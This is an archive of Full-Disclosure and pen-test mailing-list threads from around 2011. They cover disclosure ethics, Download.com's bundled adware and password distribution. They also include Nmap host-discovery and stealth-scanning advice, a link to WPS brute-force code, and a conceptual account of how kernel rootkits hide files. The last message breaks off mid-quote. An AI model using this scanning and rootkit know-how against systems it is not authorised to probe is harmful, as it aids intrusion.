Schmehlpschmehl_li...@tx.rr.com wrote: --On January 12, 2012 3:16:19 PM -0500 Benjamin Kreuter ben.kreu...@gmail.com wrote: The law is not going to stop the really bad people from attacking your system, nor is it going to stop them from profiting from whatever access they gain; sending law enforcement after someone who reports problems to you accomplishes little and only discourages people who might try to help you. Assuming everyone's motives are as pure as the driven snow is a bit naive, don't you think? Are there lingering doubts about the motives of someone who is reporting a vulnerability to you? They could have just profited from their discovery and never bothered to tell you. In any case, what have you accomplished by sending the cops after *someone who is helping you*? Unless you're a complete fool, yes. You say you're helping me, but you broke in to my server. How do I know you didn't help yourself to a permanent back door? Again, it's naive to think that most people are motivated purely by a desire to help others, especially when they are actively intruding into other people's assets. YOU might say thank you, but I'll be taking the server offline, grabbing forensic images and rebuilding it long before I get around to
Re: [Full-disclosure] facebook
Yeah, just mark those as spam. People with auto reply when they are on a mailing list are dumb. And yeah FB has no responsibility over apps. Generally and sqli or what not is going to the app owners site, not FB so why should they care? On Jan 2, 2012 12:48 PM, t0hitsugu tohits...@gmail.com wrote: uh..wtf? On Jan 2, 2012 12:46 PM, syka...@astalavista.com wrote: Ladies and gentleman, I will be unplugged from my email until the 17th of January. In the mean time here's a video of a bunny opening your mail http://www.youtube.com/watch?v=LMyaRmTwdKs Your mail will not be forwarded and I will contact you when I come back, alternatively you can contact one of the other administrators or email i...@astalavista.com Merry christmas and a happy new year! Best regards, Sykadul ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nmap
(I don't have the original, so ill qoute this guy) Nmap has an option to change how it determines if a host is up by attempting a port connection instead. I find this to be highly effective. Using a couple of standard ports are the best, such as 80, 21, etc. If you only have a few ports your searching for, then drop host discovery and scan those specific ports, youd get the same results but a tad bit less overhead(mainly in the sense of stealth or an obsession with not wasting bandwidth if you can help it) On Jan 2, 2012 1:00 PM, S Walker walke...@hotmail.co.uk wrote: Just an added note to the current replies (which are all great for hosts not in the local broadcast domain): It is almost certain that every device in your local network will respond to an ARP request. nmap does this by default anyway (-PR for local networks), but it's worth bearing in mind, as something local that won't respond to an ARP request is almost certainly not reachable. S Date: Mon, 2 Jan 2012 12:03:42 -0500 Subject: Re: Nmap From: juan.qu...@gmail.com To: pen-t...@securityfocus.com Sorry for the late answer... But when you scan for machines that do not answer to ping (it means answer with an echo reply for each echo request), you could try using timestamp, and will return timestamp reply, and also information request and wait for an information reply Both coould be useful also to detect equipments that do not answer to ping. And if you want something more noisy maybe a network discovery or a -P0 option. Here is a summary of message types with their port (for ICMP protocol). 0 Echo Reply 3 Destination Unreachable 4 Source Quench 5 Redirect 8 Echo 11 Time Exceeded 12 Parameter Problem 13 Timestamp 14 Timestamp Reply 15 Information Request 16 Information Reply More detail on: http://www.faqs.org/rfcs/rfc792.html Hope it will be useful. Regards, Juan Pablo. On Sun, Oct 2, 2011 at 4:35 PM, John M. Martinelli wrote: This would work but it would be kind of noisy to open port scan every host. Also probably a little more time consuming. Adding in syn scan or open port scan will create more time required as we're now looking for open ports. What if all ports are closed? Will it respond to a certain type of ICMP? I think a great question to ask is: What is the least-impactful way I can very quickly determine what hosts are alive? without a traditional ping sweep. On Sat, Oct 1, 2011 at 10:37 PM, Jeffory Atkinson wrote: All depends on what you are trying to achieve. I would assume that you are not concerned about monitoring devices seeing you have done a ping sweep with nmap. I agree with others a port scan is going to give you the best idea if a host is active. There are Many instances filtering devices can drop icmp or respond for hosts behind them. Open ports and services are the best identifiers. A port has to be open in some form (open or filtered) to interact with in-bound connections. I would recommend a -sS (syn) scan you can opt for standard services or add -p1- for all 65k+ ports. All ports will verify and services/demons running. There are other options if bandwidth is an issue. On Sep 30, 2011, at 5:17 PM, Ukpong wrote: Can somebody suggest the best NMAP commands for identifying hosts that are not responding to ICMP ping requests ? This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org --
Re: [Full-disclosure] INSECT Pro - Version 3.0 Released!
Seriously, what the fuck is wrong with you? How many times have you been told that full disclosure is not the place for advertising your piece of shit software? On Dec 30, 2011 4:43 PM, runlvl run...@gmail.com wrote: Great news!!! This 2012 we released the new version of INSECT PRO INSECT Pro 3.0 - Ultimate is here! This penetration security auditing and testing software solution is designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities and implement active security policies by performing penetration tests across their infrastructure and applications. Promotional price: 50 u$d! Get your copy now! From here: http://insecurityresearch.com http://www.youtube.com/watch?v=4txmfeWKaxAfeature=player_embedded Insecurity Research Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WiFi Protected Setup attack code posted
Is be surprised if anyone related to security actually thought WPS was remotely safe, bout time some actually released a public tool to brute it though :P On Dec 29, 2011 2:02 AM, Craig Heffner cheff...@devttys0.com wrote: Yesterday, Stefan published a paper describing a vulnerability in WPS that allows attackers to recover WPA/WPA2 keys in a matter of hours ( http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/ ). Code has been posted to implement the attack: http://www.tacnetsol.com/news/2011/12/28/cracking-wifi-protected-setup-with-reaver.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using hardware to attack software
Well for doing it right you pretty much just did. My main criticisms involved presentation of your work that I believed could wind up coining useless buzz words, proliferation of bad terminology, and enforcing incorrect paradigms. Your post here clarifies much of that, I just believe it should have been emphasized in the paper more as to avoid the chances of creating poor buzz words, bad terminology, etc. Perhaps refocusing the paper around some sort of 'driver vulnerability taxonomy', or as you said was intended 'overlooked/poorly understood driver attacks'. Something along those lines would have been closer to doing it right, if not nailed it. As is, the paper seems to focus on presenting the concept of utilizing hardware to beat software, when the meat of the paper is concerned with driver attack surfaces and what not. I hope that is clear as I sometimes have a bad habit of rambling. On Dec 27, 2011 1:57 PM, Forristal, Jeff jeff.forris...@intel.com wrote: Hi Gage, thanks for the feedback. Drivers certainly are a big player here, since they are the main interfacers [sic] to hardware along with BIOS and VMMs. There's also some corner-case stuff that talks to hardware like TXT ACMs, a la ITL's published SINIT work. Yes, the weaknesses live in the software. That's why the paper focused on the use of software-influenced hardware elements to facilitate an attack on (presumably more privileged) software. So your observation about 'hardware attacks' is correct, but that's not what the paper was about. Attacking the hardware directly ('hardware attacks') was claimed in the paper to be out of scope--it was always about attacking/reaching a vulnerability located in software. I believe the topic of hardware facilitated attacks is a conversation about attack surface (specifically the surface the driver exposes to the hardware), how much trust the driver gives to the hardware, and how it (is? may be?) a direction of attacks that is not as 'fortified' as other attack surfaces pointed in other directions. Drivers may expect to be attacked from above (i.e. the conceptual PC stack), but are drivers being designed and implemented to robustly withstand attacks coming from below? Should they? And I agree, 'hardware reflected injection' is not a new vulnerability. Neither is '2nd order injection.' But both of those terms provide additional context to the attack pattern circumstances being used to reach a software weakness. My whitepaper was focusing on under-considered attacks, not new vulnerabilities specifically. Let me know if I mixed up the language somewhere--I had thought I had successfully preserved the distinction between attacks and vulnerabilities throughout. As for doing it wrong, that's fair. What do you consider to be doing it right? Thanks, - Jeff -Original Message- From: Gage Bystrom [mailto:themadichi...@gmail.com] Sent: Saturday, December 24, 2011 5:21 PM To: Forristal, Jeff; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Using hardware to attack software While it was slightly interested to read, and I do not doubt the intention of the whitepaper, I believe it to be nearly useless. All it is, as they say, is a 'call-to-arms' to add additional classification of vulnerabilities. Almost all of those attacks described are really driver attacks. The ones that were not driver attacks was malicious hardware.(wow I was really fighting myself on the grammar/word choice on that sentence, but I think it makes sense so screw it). I do believe that kernel/driver related vulnerabilities should have better classification in order to identify, exploit, and fix them better(much in the vein that classifying some code segment as an integer overflow aids working with memory corruption bugs); however, because almost all of those are driver bugs, a software issue, I believe they can hardly be considered 'hardware attacks'. One slight pet peeve is that 'hardware reflected injection' sounds just like a lame attempt to create a new buzzword. Saying that failure for hardware/drivers to sanitize malicious data that can lead to defects higher up, is like calling the failure to sanitize return values from nested functions leading to a buffer overflow a 'function reflected injection' vulnerability. I do not believe that 'function reflected injection' warrants a classification of it's own just as I believe that hardware blah blah deserves to be a classification of it's own. I still respect their intent, I just think this whitepaper is completely doing it wrong. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Using hardware to attack software
While it was slightly interested to read, and I do not doubt the intention of the whitepaper, I believe it to be nearly useless. All it is, as they say, is a 'call-to-arms' to add additional classification of vulnerabilities. Almost all of those attacks described are really driver attacks. The ones that were not driver attacks was malicious hardware.(wow I was really fighting myself on the grammar/word choice on that sentence, but I think it makes sense so screw it). I do believe that kernel/driver related vulnerabilities should have better classification in order to identify, exploit, and fix them better(much in the vein that classifying some code segment as an integer overflow aids working with memory corruption bugs); however, because almost all of those are driver bugs, a software issue, I believe they can hardly be considered 'hardware attacks'. One slight pet peeve is that 'hardware reflected injection' sounds just like a lame attempt to create a new buzzword. Saying that failure for hardware/drivers to sanitize malicious data that can lead to defects higher up, is like calling the failure to sanitize return values from nested functions leading to a buffer overflow a 'function reflected injection' vulnerability. I do not believe that 'function reflected injection' warrants a classification of it's own just as I believe that hardware blah blah deserves to be a classification of it's own. I still respect their intent, I just think this whitepaper is completely doing it wrong. On Fri, Dec 23, 2011 at 2:27 PM, Forristal, Jeff jeff.forris...@intel.com wrote: Folks on this list may be interested in a recent whitepaper talking about types of attacks that leverage PC hardware to attack local software. Hardware reflected injection, anyone? Paper is available at http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf Thanks, and happy holidays! - Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Fwd: Updates on Download.Com caught adding malware to Nmap installer]
Fyodor has every right to tell them to fuck off. This is simple backstabbing now matter how you look at it. What makes me wonder is if the right people will get enraged enough to do something drastic if drastic measures are required. Truthfully I'm almost betting that there is a law or two broken here. Someone like Fyodor or anyone using that service ought to find a talented and ambitious lawyer to look over the case. A class action lawsuit is definately applicaible if a case against even a single law can be made. On Dec 8, 2011 3:32 AM, mu...@rubos.com wrote: Original Message Subject: Updates on Download.Com caught adding malware to Nmap installer From:Fyodor fyo...@insecure.org Date:Tue, December 6, 2011 11:11 pm To: nmap-hack...@insecure.org -- Hi Folks. A lot has happened since yesterday's email about Download.com's antics (http://seclists.org/nmap-hackers/2011/5) and I wanted to send a quick update. First of all, several people complained about my angry tone and my telling Download.com to F*ck themselves. I appologize to anyone offended. But if you ever spend more than 14 years creating free software as a gift to the community, only to have it used as bait by a giant corporation to infect your users with malware, then you may understand my rage. The good news is that many users are sick and tired of having their machines hijacked by malware. Especially by CNET Download.Com, which still says on their own adware policy page: In your letters, user reviews, and polls, you told us bundled adware was unacceptable--no matter how harmless it might be. We want you to know what you're getting when you download from CNET Download.com, and no other download site can promise that. --http://www.cnet.com/2723-13403_1-461-16.html Um, what people WANT when they download Nmap is Nmap itself. Not to have their searches redirected to Bing and their home page changed to Microsoft's MSN. Speaking of which, Microsoft emailed me today. They said that they didn't know they were sponsoring CNET to trojan open source software, and that they have stopped doing it. But the trojan installer uses your Internet connection to obtain more special offers from CNET, and they immediately switched to installing a Babylon toolbar and search engine redirect instead. Then CNET removed that and are now promoting their own techtracker tool. Apparently the heat is so high that even malware vendors are refusing to have any more part in CNET's antics! But if CNET isn't stopped, the malware vendors will come crawling back eventually and CNET will be there to receive them. There have been dozens of news articles in the last day and hundreds of outraged comments on blogs, Twitter, Facebook, etc. In the midst of all this terrible PR, Download.com went in last night and quietly switched their Nmap downloads back to our real installer. At least for now. But that isn't enough--they are still infecting the installers for thousands of other packages! For example, they have currently infected the installer for a children's coloring book app: http://download.cnet.com/Kea-Coloring-Book/3000-2102_4-10360620.html Have they no shame at all??! I've created a page with the situation background, links to the news articles, and the latest updates: http://insecure.org/news/download-com-fiasco.html Feel free to share it. Together, I hope we can get Download.Com to apologize and cease this reprehensible behavior! Cheers, Fyodor ___ Sent through the nmap-hackers mailing list http://cgi.insecure.org/mailman/listinfo/nmap-hackers Archived at http://seclists.org/nmap-hackers/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google open redirect
Good point. Makes me wonder though how many people realize that ZDi and such are third parties. On Dec 8, 2011 9:47 AM, valdis.kletni...@vt.edu wrote: On Thu, 08 Dec 2011 14:24:21 -0300, Pablo Ximenes said: 2011/12/8 Michal Zalewski lcam...@coredump.cx If you don't like it, let us know how to improve it. You also always have the option of not researching vulnerabilities in these platforms; going with the full-disclosure approach; or selling the flaws to a willing third party. Well, selling flaws to third parties might be considered a crime in some places, so I would be cautious with that approach. I suspect a large portion of the people who are selling flaws to third parties are not at all concerned about whether selling the flaw is a crime, as often the bigger question is how many crimes were committed in the discovery process... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Minimum Syslog Level Needed for Court Trial
Doesn't matter. You just gotta prove it wasn't tampered with. Conversely, you just gotta prove that it was tampered with, but by the suspect. On Thu, Dec 8, 2011 at 8:16 PM, james.macchle...@gmail.com wrote: Good Day All, I am looking to see if any of you know what minimum syslog level needs to be set at to be presented as proper evidence in a Court of Law? If you know could please let me know and point me to specific references in the Computer Forensics realm? Thank you for your assistance. Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] distributing passwords to users
O.o and you act like what he wants is a good thing? Getting /any/ service account with that file would be better than pillaging an entire server of ssh keys. With ssh keys you know you only got access to a few more servers on the network, maybe not even root or admin unless you got lucky and score the key used for root/admin for every single box. No, with that you score the entire clientele... Not to mention what you described is not what he is asking. He wants to distribute the passwords to multiple users(idc if they are hashed, encrypted or not, just minor details at this point). What you described is a centralized database. There's only one copy of the file, only one server that holds the goods, the rest can have tidbits and if compromised can do minimum damage. Coupled with the right motivations and logging then attacking the support group on the internal network gives you almost nothing. Conversely attacking a single user holding the password file for the OP is end game. You're simply not going to be able to secure multiple copies of the same file with different access controls(hey I used a textbook phrase :) ). The only alternative is to have one access control, or all users have the same permission. However that is also absurd, you're only multiplying your attack service with each added user. Maybe now ya see where I start wondering where the cognitive dissonance ought to be coming in for attempting what the OP is trying to do? I was wrong for assuming it should be obvious from the get go, but as you can see the ISP wasn't in the same boat he wants to board. They would be sitting in the crows nest wondering why the loonie on the deserted island was trying to paddle it home. Alright, I think I've been harsh enough on the poor OP, but I hope he understands that this is a classic case of You're doing it wrong. He knows what needs to be done, but his method of doing so actively works against his goal. On Dec 6, 2011 10:51 PM, James Condron ja...@zero-internet.org.uk wrote: An ISP I worked at stored logins for customer servers where the customer required us to be able to login to provide support. We used a webapp on our internal network with the relevant security accoutrements. Its pretty standard; you login, find the server you need credentials for and hit a button to either launch a putty session or an RDP session. You can also edit passwords or view for non-windows users. The reason tools exist is because there is a demand for them- hell, its a password safe. Perhaps OP should look at this type of solution. On Wed, Dec 7, 2011 at 6:28 AM, Gage Bystrom themadichi...@gmail.comwrote: I'm disturbed in the first place that you want to distribute password lists to multiple users. I'm disturbed more so that there is no apparent cognitive dissonance preventing you from functioning enough to have sent that email. Someone please tell me that I'm not the only one disturbed here? And if I am, point to me why please? On Mon, Dec 5, 2011 at 7:30 PM, G V gvasi...@gmail.com wrote: Hi, From your experience, what's the best secure and easy way to update a password list and distribute it to 1000 or so unix users? The users would have different privilege levels and different access on network. Throwing ideas, I can think of: pgp (difficult to maintain a separate file for each user), web app (would need to be sucured over ssl, possible password protected), usb disks (difficult to manage changes). Anyone using an enterprise level app (commercial or not) to share passwords to users, manage changes and so on? Any other ideas I can use? Thank you, George Vasiliu Securing Apache Web Server with thawte Digital Certificate In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how it benefits your company and how your customers can tell if a site is secure. You will find out how to test, purchase, install and use a thawte Digital Certificate on your Apache web server. Throughout, best practices for set-up are highlighted to help you ensure efficient ongoing management of your encryption keys and digital certificates. http://www.dinclinx.com/Redirect.aspx?36;4175;25;1371;0;5;946;e13b6be442f727d1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] distributing passwords to users
I would, except I have no clue what it is he intends to do. Even then there's no reason to, its already been done for me. As I explained to the former Isp employee guy, the isp was doing the right thing to accomplish similar goals(I presume, like I said I have no clue why the OP wants to do what he wants to do). Of course the only caveat is that if the central database does not enforce policy or if it isn't locked down, then all sorts of disaster idioms start applying. Maybe torching a man with words doesn't help him, but its good for showing others a point, but if a few words of advice in the right direction help him then no words while lighting flares over the right road should be even better, right? P.s I lied, I have no clue if the ISPs method is standard. However I do surmise that it likely worked fine with a risk level they found acceptable, which is far superior than most standard solutions I've seen stammered out by many. On Dec 7, 2011 12:54 AM, Martijn Broos martijn.br...@traxion.com wrote: Ok, You have been harsh enough on the poor solution the user is going to choose. Are you willing to give him some advise or directions where he should go to? ** ** A textbook sentence I always learned was: You can burn a person with many words, it is better to help him with few in the right direction! ** ** If he doesn’t know what he is doing wrong, then how do you think he will learn to do it right the next time. He is clearly asking for advise. ** ** Are there standard solutions for managing passwords which need to be used by many users and securing them without telling the real password to the user who needs one to impersonate as another user? ** ** Kind regards, ** ** Martijn ** ** ** ** *From:* full-disclosure-boun...@lists.grok.org.uk [mailto: full-disclosure-boun...@lists.grok.org.uk] *On Behalf Of *Gage Bystrom *Sent:* woensdag 7 december 2011 9:38 *To:* full-disclosure@lists.grok.org.uk *Subject:* Re: [Full-disclosure] distributing passwords to users ** ** O.o and you act like what he wants is a good thing? Getting /any/ service account with that file would be better than pillaging an entire server of ssh keys. With ssh keys you know you only got access to a few more servers on the network, maybe not even root or admin unless you got lucky and score the key used for root/admin for every single box. No, with that you score the entire clientele... Not to mention what you described is not what he is asking. He wants to distribute the passwords to multiple users(idc if they are hashed, encrypted or not, just minor details at this point). What you described is a centralized database. There's only one copy of the file, only one server that holds the goods, the rest can have tidbits and if compromised can do minimum damage. Coupled with the right motivations and logging then attacking the support group on the internal network gives you almost nothing. Conversely attacking a single user holding the password file for the OP is end game. You're simply not going to be able to secure multiple copies of the same file with different access controls(hey I used a textbook phrase :) ). The only alternative is to have one access control, or all users have the same permission. However that is also absurd, you're only multiplying your attack service with each added user. Maybe now ya see where I start wondering where the cognitive dissonance ought to be coming in for attempting what the OP is trying to do? I was wrong for assuming it should be obvious from the get go, but as you can see the ISP wasn't in the same boat he wants to board. They would be sitting in the crows nest wondering why the loonie on the deserted island was trying to paddle it home. Alright, I think I've been harsh enough on the poor OP, but I hope he understands that this is a classic case of You're doing it wrong. He knows what needs to be done, but his method of doing so actively works against his goal. On Dec 6, 2011 10:51 PM, James Condron ja...@zero-internet.org.uk wrote: An ISP I worked at stored logins for customer servers where the customer required us to be able to login to provide support. We used a webapp on our internal network with the relevant security accoutrements. Its pretty standard; you login, find the server you need credentials for and hit a button to either launch a putty session or an RDP session. You can also edit passwords or view for non-windows users. The reason tools exist is because there is a demand for them- hell, its a password safe. Perhaps OP should look at this type of solution. On Wed, Dec 7, 2011 at 6:28 AM, Gage Bystrom themadichi...@gmail.com wrote: I'm disturbed in the first place that you want to distribute password lists to multiple users. I'm disturbed more so that there is no apparent cognitive dissonance preventing you from
Re: [Full-disclosure] one of my servers has been compromized
Oh it certainly is a distinction, and that very distinction is important enough to have caused the creation of kernel rootkits in the first place: the kernel is absolute. There is nothing any software can do without the kernel. For instance say you got a guy with a userland rootkit. He wants to hide a file so ls, and several other binaries were modified. You load up python, whip up a quick script and boom you can see all the previously hidden files. Kernel kit and you have to hook a few system calls and monitor the incoming values. If it would return your file and the 'password' wasn't given, you can return bogus information and EVERY tool will fall for it. Also not everything has to be done in userland to get done. The kernel is fully capable of sending out packets, creating files, etc. Userland in fact relies on the kernel for all of these. If you get to the kernel you control all of both worlds. You get the userland and in truth you only control a portion of the userland. Mighty difference indeed. On Dec 7, 2011 7:20 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: But whether you have a kernel rootkit or not isn't all that important. In either case the system is going to be doing unwanted things, and you detect those unwanted things with the usual system utilities. If a kernel rootkit didn't affect userland, what would be its purpose? Even to transmit data offsite you have to invoke network capabilities, file system capabilities, etc. IOW, it's a distinction without difference. --On December 6, 2011 11:48:02 AM -0800 Gage Bystrom themadichi...@gmail.com wrote: My bad, should have said that you can't trust the md5sum tampering(since you stated to have a static copy on the flash drive) but you couldn't trust it since you couldn't trust the system calls. The immediate moment you have to worry about a legit userland rootkit you have to worry about a kernel rootkit. After all you have to consider the psychology of the attacker. If you were to compromise a box, and cared enough to hide a backdoor they cannot detect without static, write proof media, then you care enough to go the extra step for a kernel rootkit. Otherwise you would be spending even more time and effort to make your userland kit work to satisfaction for a far weaker hold on the box. It would simply be idiotic. And I think we can all agree that an attacker able to do either of the above is not an idiot. On Dec 6, 2011 10:19 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: A poor man's root kit detector is to take md5sums of critical system binaries (you'd have to redo these after patching), and keep the list on an inaccessible media (such as a thumb drive). If you think the system is compromised, run md5sum against those files, and you will quickly know. You could even keep statically compiled copies on the thumb drive to use in an investigation. -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. * It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson There are some ideas so wrong that only a very intelligent person could believe in them. George Orwell ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
And quite annoying. Why do you even need an email address in the first place? You're already pulling people in from a mailing list. And its rude to require anything at all to access the content you're presenting to FD. After all that's one of the primary reasons so many people hate jsacco. On Dec 7, 2011 12:43 PM, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07/12/2011 10:02, Olga Głowala wrote: New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue. It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for full copy. Your post is misleading to say the least. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTt/QYLIvn8UFHWSmAQIzFggAnxvnG44EGxYO/cJ6lG5da8F8vlc5iMgr l+BL7VvtBklGZ8U2kzV2Rg61dWEJfBKv0qR/uqVMv1tQsj+ssfFp4ZmKRoPAjWXi V3fx1ejfxeeVxazOOHB9hi9w0L5CwR85/WWgqzdbjaN6A5odeWCnM5BMzp0nIlQX +sESl0nu/4XXBWRDW+7OeRsuOgeoiaJLagCvXy6gFqObaEjesx5A+qaq7zBbRrWJ Im77mRdSAt9N0oCWs9dlgB0bzv3Fjxo64jUCiiebt4im6bVyR646pkp8DSL7Zndc D+Ar+E7HecmdtBU7Ywnx5dxDuCu9h1V4lJ46Khxe7nBk+i5w3gg7/A== =gt1t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude. On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote: umm, its not misleading atall.. this is the first look and, i understood well, if you bother to visit the address... theyre 'teasers' so, you dont get a FULL magazine or, kit, you opnly get the first like chapter/pages, thats similar to many other *products* , not freebies... On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07/12/2011 10:02, Olga Głowala wrote: New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue. It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for full copy. Your post is misleading to say the least. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTt/QYLIvn8UFHWSmAQIzFggAnxvnG44EGxYO/cJ6lG5da8F8vlc5iMgr l+BL7VvtBklGZ8U2kzV2Rg61dWEJfBKv0qR/uqVMv1tQsj+ssfFp4ZmKRoPAjWXi V3fx1ejfxeeVxazOOHB9hi9w0L5CwR85/WWgqzdbjaN6A5odeWCnM5BMzp0nIlQX +sESl0nu/4XXBWRDW+7OeRsuOgeoiaJLagCvXy6gFqObaEjesx5A+qaq7zBbRrWJ Im77mRdSAt9N0oCWs9dlgB0bzv3Fjxo64jUCiiebt4im6bVyR646pkp8DSL7Zndc D+Ar+E7HecmdtBU7Ywnx5dxDuCu9h1V4lJ46Khxe7nBk+i5w3gg7/A== =gt1t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Lol I get that, but was the teaser 23 pages? On Dec 7, 2011 12:53 PM, GloW - XD doo...@gmail.com wrote: Well, it does force a registration, even for the teasers, thats rude, but yes, it does have a teaser for each issue.. still, is FD the place for these things, i dont know.. On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote: I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude. On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote: umm, its not misleading atall.. this is the first look and, i understood well, if you bother to visit the address... theyre 'teasers' so, you dont get a FULL magazine or, kit, you opnly get the first like chapter/pages, thats similar to many other *products* , not freebies... On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07/12/2011 10:02, Olga Głowala wrote: New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/ http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your 